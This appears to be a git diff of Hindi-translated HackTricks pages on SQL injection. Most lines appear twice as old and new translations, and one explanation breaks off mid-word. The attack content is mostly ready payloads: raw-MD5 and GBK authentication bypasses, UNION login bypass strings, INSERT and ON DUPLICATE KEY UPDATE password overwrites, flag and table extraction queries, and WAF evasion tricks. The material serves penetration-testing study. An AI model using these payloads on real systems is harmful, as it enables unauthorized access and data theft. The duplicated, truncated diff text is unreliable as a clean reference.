यह क्वेरी एक कमजोरी को प्रदर्शित करती है जब MD5 का उपयोग सत्य के साथ किया जाता है असली आउटपुट के लिए प्रमाणीकरण चेक्स में, जिससे सिस्टम SQL इन्जेक्शन के लिए संवेदनशील हो जाता है। हमलावर इसे उत्पन्न कर सकते हैं जब वे इनपुट को तैयार करते हैं जो, जब हैश किया जाता है, अप्रत्याशित SQL कमांड भागों को उत्पन्न करते हैं, जिससे अनधिकृत पहुंच होती है।
यह क्वेरी एक कमजोरी को प्रदर्शित करती है जब MD5 का उपयोग सत्य के साथ किया जाता है जो कि प्रमाणीकरण जांचों में रॉ आउटपुट के लिए है, जिससे सिस्टम SQL इन्जेक्शन के लिए संवेदनशील हो जाता है। हमलावर इसे उत्पन्न कर सकते हैं जब वे इनपुट को तैयार करते हैं जो, जब हैश किया जाता है, अप्रत्याशित SQL कमांड भागों को उत्पन्न करते हैं, जिससे अनधिकृत पहुंच होती है।
```sql
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
@ -298,16 +298,16 @@ sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
**सुझाई गई सूची**:
**सुझाए गए सूची**:
आपको प्रत्येक पंक्ति का उपयोग उपयोगकर्ता नामके रूप में करना चाहिए और हमेशा पासवर्ड के रूप में: _**Pass1234.**_\
_(ये payloads इस खंड की शुरुआत में उल्लिखित बड़ी सूची में भी शामिल हैं)_
_(ये पेलोड इस सेक्शन की शुरुआत में उल्लिखित बड़ी सूची में भी शामिल हैं)_
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
### GBK प्रमाणीकरण बायपास
यदि ' को बचाया जा रहा है तो आप %A8%27 का उपयोग कर सकते हैं, और जब ' को बचाया जाता है तो यह बनाया जाएगा: 0xA80x5c0x27 (_╘'_)
यदि ' को छोड़ दिया जा रहा है तो आप %A8%27 का उपयोग कर सकते हैं, और जब ' को छोड़ दिया जाता है तो यह बनाया जाएगा: 0xA80x5c0x27 (_╘'_)
```sql
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
@ -326,7 +326,7 @@ print r.text
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## Insert Statement
## इन्सर्ट स्टेटमेंट
### मौजूदा ऑब्जेक्ट/उपयोगकर्ता का पासवर्ड संशोधित करें
@ -336,7 +336,7 @@ name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```
### ON DUPLICATE KEY UPDATE
`ON DUPLICATE KEY UPDATE` क्लॉज MySQL में उपयोग किया जाता है ताकि डेटाबेस को बताया जा सके कि जब कोशिश की जाती है कि एक पंक्ति डाली जाए जो एक अद्वितीय सूचकांक या प्राथमिक कुंजी में एक डुप्लिकेट मान का परिणाम होगा, तो डेटाबेस को क्या कार्रवाई करनी चाहिए। निम्नलिखित उदाहरण दिखाता है कि यह सुविधा कैसे उपयोग की जा सकती है ताकि एक प्रशासक खाते का पासवर्ड संशोधित किया जा सके:
`ON DUPLICATE KEY UPDATE` क्लॉज MySQL में उपयोग किया जाता है ताकि डेटाबेस को बताया जा सके कि जब कोशिश की जाती है कि एक पंक्ति डाली जाए जो एक अद्वितीय सूचकांक या प्राथमिक कुंजी में एक डुप्लिकेट मान का परिणाम देगी, तो डेटाबेस को क्या कार्रवाई करनी चाहिए। निम्नलिखित उदाहरण दिखाता है कि यह सुविधा कैसे उपयोग की जा सकती है ताकि एक प्रशासक खाते का पासवर्ड संशोधित किया जा सके:
उदाहरण पेलोड इन्जेक्शन:
@ -346,15 +346,8 @@ INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_
```
यह कैसे काम करता है:
- क्वेरी दो पंक्तियाँ डालने का प्रयास करती है: `generic_user@example.com` के लिए एक और `admin_generic@example.com` के लिए एक।
- अगर `admin_generic@example.com` के लिए पंक्ति पहले से मौजूद है, तो `ON DUPLICATE KEY UPDATE` क्लॉज़ ट्रिगर होता है, जिससे MySQL को मौजूदा पंक्ति के `password` फ़ील्ड को "bcrypt_hash_of_newpassword" में अपडेट करने के लिए निर्देशित किया जाता है।
- इसके फलस्वरूप, प्रमाणीकरण फिर `admin_generic@example.com` का प्रयास किया जा सकता है जिसमें "bcrypt_hash_of_newpassword" के लिए उस नए पासवर्ड के bcrypt हैश का उपयोग किया जाता है (जो वास्तविक पासवर्ड के इच्छित हैश का बदला जाना चाहिए)।
### जानकारी निकालें
#### एक साथ 2 खाते बनाना
नए उपयोगकर्ता और उपयोगकर्ता नाम, पासवर्ड और ईमेल बनाने की कोशिश करते समय:
- क्वेरी दो पंक्तियाँ डालने का प्रयास करती है: एक `generic_user@example.com` के लिए और दूसरा `admin_generic@example.com` के लिए।
- अगर `admin_generic@example.com` के लिए पंक्ति पहले से मौजूद है, तो `ON DUPLICATE KEY UPDATE` शर्त सक्रिय हो जाती है, जिससे MySQL को मौजूदा पंक्ति के `password` फ़ील्ड को "bcrypt_hash_of_newpassword" में अपड
```
SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
@ -369,7 +362,7 @@ A new user with username=otherUsername, password=otherPassword, email:FLAG will
```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
टेक्निकल टेक्स्ट को प्राप्त करने के लिए आप निम्नलिखित का उपयोग कर सकते हैं:
टेक्निकल टेक्स्ट प्राप्त करने के लिए आप निम्नलिखित का उपयोग कर सकते हैं:
```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```
@ -384,13 +377,13 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन की सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफनती मिलन स्थल है हर विषय में।
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने के मिशन** के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है हर विषय में।
{% embed url="https://www.rootedcon.com/" %}
## Routed SQL injection
रूटेड SQL इजेक्शन एक स्थिति है जहाँ इंजेक्टेबल क्वेरी वह नहीं है जो आउटपुट देती है बल्कि इंजेक्टेबल क्वेरी का आउटपुट वह क्वेरी है जो आउटपुट देती है। ([पेपर से](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
रूटेड SQL इन्जेक्शन एक स्थिति है जहाँ इंजेक्टेबल क्वेरी वह नहीं है जो आउटपुट देती है बल्कि इंजेक्टेबल क्वेरी का आउटपुट वह क्वेरी है जो आउटपुट देती है। ([पेपर से](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
उदाहरण:
```
@ -401,9 +394,9 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
[यहाँ से प्रारंभिक बायपास](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)
### कोई अंतरिक्ष बायपास
### कोई अंतर्विराम बायपास
कोई अंतरिक्ष (%20) - व्हाइटस्पेस विकल्प का उपयोग करके बायपास करें
कोई अंतर्विराम (%20) - व्हाइटस्पेस विकल्प का उपयोग करके बायपास करें
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
@ -414,13 +407,23 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
```
### No Whitespace - टिप्पणियों का उपयोग करके बायपास करें
In some cases, you may encounter filters that block whitespace characters. In such situations, you can bypass the filter by using comments to separate SQL keywords. For example, you can convert a query like `SELECT * FROM users WHERE username='admin' AND password='password'` into `SELECT/**/*/**/FROM/**/users/**/WHERE/**/username='admin'/**/AND/**/password='password'`. This technique allows you to evade detection and successfully execute SQL injection attacks even when whitespace is restricted.
In some cases, the application may filter out whitespace characters to prevent SQL injection attacks. However, you can bypass this restriction by using comments to separate SQL keywords. This technique allows you to execute SQL queries without spaces between keywords.
For example, instead of using:
```sql
SELECT * FROM users WHERE username = 'admin' AND password = 'password';
```
You can use comments to bypass the whitespace restriction:
```sql
SELECT/**/*/**/FROM/**/users/**/WHERE/**/username/**/=/**/'admin'/**/AND/**/password/**/=/**/'password';
```
```sql
?id=1/*comment*/and/**/1=1/**/--
```
### No Whitespace - पैरेंथेसिस का उपयोग करके बायपास करें
In some cases, spaces are not allowed in the input fields. In such situations, you can bypass the restriction by using parenthesis to separate the SQL keywords. For example, instead of `UNION SELECT`, you can use `UNION(SELECT) SELECT`. This technique can help you perform SQL injection even when whitespace is restricted.
### कोई व्हाइटस्पेस - पैरेंथेसिस का उपयोग करके बायपास करें
```sql
?id=(1)and(1)=(1)--
```
@ -432,13 +435,13 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
```
### सामान्य बायपास
कीवर्ड का उपयोग करके ब्लैकलिस्ट - अपरकेस/लोअरकेस का उपयोग करके बायपास करें
कीवर्ड का उपयोग करके काल सूची - अपरकेस/लोअरकेस का उपयोग करके बायपास करें
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
### Blacklist के लिए कीवर्ड का इस्तेमाल केस इनसेंसिटिव - एक समकक्ष ऑपरेटर का उपयोग करके बायपास करें
### Blacklist के लिए कीवर्ड का इस्तेमाल केस इनसेंसिटिव - एक समकक्ष ऑपरेटर का उपयोग करके उसे अनदेखा करें
```
AND -> && -> %26%26
OR -> || -> %7C%7C
@ -448,18 +451,18 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
```
### वैज्ञानिक नोटेशन WAF बायपास
आप इस तरह के ट्रिक का अधिक विस्तृत विवरण [gosecure ब्लॉग](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) में पा सकते हैं।\
मूल रूप से, आप WAF को इसे बायपास करने के लिए अप्रत्याशित तरीकों में वैज्ञानिक नोटेशन का उपयोग कर सकते हैं:
आप इस तरीके के बारे में और विस्तृत जानकारी [gosecure ब्लॉग](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) में पा सकते हैं।\
मूल रूप से, आप WAF को बायपास करने के लिए अप्रत्याशित तरीके से वैज्ञानिक नोटेशन का उपयोग कर सकते हैं:
```
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
```
### कॉलम नामों की प्रतिबंधन को उलट दें
### कॉलम नामों की प्रतिबंधितता को उलट देना
सबसे पहले, ध्यान दें कि यदि **मूल क्वेरी और वह तालिका जहां से आप झंडा निकालना चाहते हैं, उनके पास एक ही संख्या के कॉलम हैं** तो आप बस यह कर सकते हैं: `0 UNION SELECT * FROM flag`
सबसे पहले, ध्यान दें कि यदि **मूल क्वेरी और तालिका जहां से आप झंडा निकालना चाहते हैं, उनके पास एक ही संख्या के कॉलम हैं** तो आप बस यह कर सकते हैं: `0 UNION SELECT * FROM flag`
यह संभव है कि आप **किसी तालिका के तीसरे कॉलम तक पहुंचें बिना उसके नाम का उपयोग किए** जानकारी के लिए निम्नलिखित प्रकार का क्वेरी उपयोग करें: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, इसलिए एक एसक्यूएल इन्जेक्शन में यह ऐसा दिखेगा:
यह संभव है कि आप **किसी तालिका के तीसरे कॉलम तक पहुंचें बिना उसके नाम का उपयोग किए** जा सकता है एक क्वेरी का उपयोग करके जैसे कि निम्नलिखित: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, इसलिए एक एसक्यूएल इन्जेक्शन में यह ऐसा दिखेगा:
```bash
# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
@ -486,7 +489,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %}
@ -494,10 +497,10 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पहुंच चाहते हैं या PEASS को डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**।
</details>

View file

@ -4,15 +4,15 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md) [**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।
</details>
निम्नलिखित ब्लॉग्स की जाच करें:
निम्नलिखित ब्लॉग्स की जाच करें:
* [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits)
* [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)
@ -21,10 +21,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md) [**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उत्तेजक मिलन स्थल है हर विषय में।
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है हर विषय में।
{% embed url="https://www.rootedcon.com/" %}
@ -66,7 +66,7 @@ from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/]
## फ्लो
ध्यान रखें कि "आधुनिक" **MySQL** के संस्करणों में आप "_**information\_schema.tables**_" को "_**mysql.innodb\_table\_stats**_**"** के लिए प्रतिस्थापित कर सकते हैं (यह WAFs को छलने के लिए उपयोगी हो सकता है)।
ध्यान रखें कि "आधुनिक" संस्करणों में **MySQL** में आप "_**information\_schema.tables**_" को "_**mysql.innodb\_table\_stats**_**"** के लिए प्रतिस्थापित कर सकते हैं (यह WAFs को छलने के लिए उपयोगी हो सकता है)।
```sql
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
@ -91,7 +91,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
* `SELECT INSTR('foobarbar', 'fo...')=1`
## कॉलमों की संख्या का पता लगाएं
## कॉलमों की संख्या का पता लगाना
एक सरल ORDER का उपयोग
```
@ -115,15 +115,15 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```
## SSRF
**यहाँ विभिन्न विकल्प सीखें** [**एक Mysql इन्जेक्शन का दुरुपयोग करके SSRF प्राप्त करने के लिए**](mysql-ssrf.md)**।**
**यहाँ सीखें कि** [**एक Mysql इंजेक्शन का दुरुपयोग करके SSRF प्राप्त करने के विभिन्न विकल्प**](mysql-ssrf.md)**।**
## WAF बायपास ट्रिक्स
### जानकारी\_स्कीमा विकल्प
ध्यान रखें कि "आधुनिक" **MySQL** के संस्करणों में आप _**information\_schema.tables**_ को _**mysql.innodb\_table\_stats**_ या _**sys.x$schema\_flattened\_keys**_ या **sys.schema\_table\_statistics** के लिए प्रतिस्थापित कर सकते हैं।
ध्यान रखें कि "आधुनिक" **MySQL** के "संस्करणों" में आप _**information\_schema.tables**_ को _**mysql.innodb\_table\_stats**_ या _**sys.x$schema\_flattened\_keys**_ या **sys.schema_table_statistics** के लिए प्रतिस्थापित कर सकते हैं।
### COMMAS के बिना MySQL इन्जेक्शन
### COMMAS के बिना MySQL इजेक्शन
कोई कमा उपयोग किए बिना 2 स्तंभ चुनें ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
```
@ -131,13 +131,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```
### कॉलम के नाम के बिना मानों को पुनः प्राप्त करना
